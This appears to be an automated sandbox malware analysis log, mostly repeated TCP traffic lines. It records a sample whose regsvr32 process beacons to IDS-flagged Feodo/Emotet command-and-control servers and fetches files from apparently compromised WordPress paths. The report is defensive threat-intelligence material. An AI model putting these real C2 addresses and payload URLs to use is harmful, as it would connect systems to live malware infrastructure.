                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 218.38.121.17:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 163.172.108.69:80
                        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.23.117.132:80
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.1.136.16:80

                        Networking

                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 115.178.55.22 80
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.105.115.71 8080
                        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                        Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.22:49179 -> 218.38.121.17:443
                        Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.178.55.22:80
                        Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
                        Source: global trafficHTTP traffic detected: POST /kwxkonang/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 357Host: 218.38.121.17
                        Source: global trafficHTTP traffic detected: POST /tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 280Host: 218.38.121.17
                        Source: Joe Sandbox ViewIP Address: 172.105.115.71
                        Source: Joe Sandbox ViewIP Address: 188.165.79.151
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49184 version: TLS 1.0
                        Source: global trafficHTTP traffic detected: GET /wp-admin/4m1WxDxza6D8SVrfF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hsweixintp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /admin002vqimbe/hRFZkkzLIl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stickers-et-deco.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/cXEhHssszV/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.cecambrils.catConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-includes/d6tkyFFBNwY/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.clinicaportalpsicologia.com.brConnection: Keep-Alive
                        Source: unknownNetwork traffic detected: IP country count 21
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Nov 2022 04:43:18 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-76bfdce226b740dc1298019a18e61155=454f5619c2242a2b3d522efeae2f6c48a578aba8c10278d9f2d8899a3fcad222%3A7VXP1JRg6sMvuxPANoFERLi7pCnrxsYqh8BZef4CZlrnQztM92Sg9jLq7GIDevQzzQ9P0reTobhVinLo3QJBWkBFdKI37ltxfwgwuTELet01SKQ4bMLcAdkfSwCEuWEVYtW0yeVouVHIO8jPqvQEHfrz8a8OziW2SVas17jQLdQ%3D; expires=Tue, 06-Dec-2022 04:43:18 GMT; Max-Age=1728000; path=/; domain=www.stickers-et-deco.com; httponlyVary: User-AgentConnection: keep-alive, Keep-AliveKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Ascii: 5a11<!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--><html lang="fr-fr"><head><meta charset="utf-8" /><titl
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 16 Nov 2022 04:39:49 GMTServer: ApacheStrict-Transport-Security: max-age=63072000;X-Content-Type-Options: nosniffLast-Modified: Wed, 04 Jul 2018 11:59:53 GMTETag: "400-5702b2b206040"Accept-Ranges: bytesContent-Length: 1024X-Powered-By: PleskLinKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
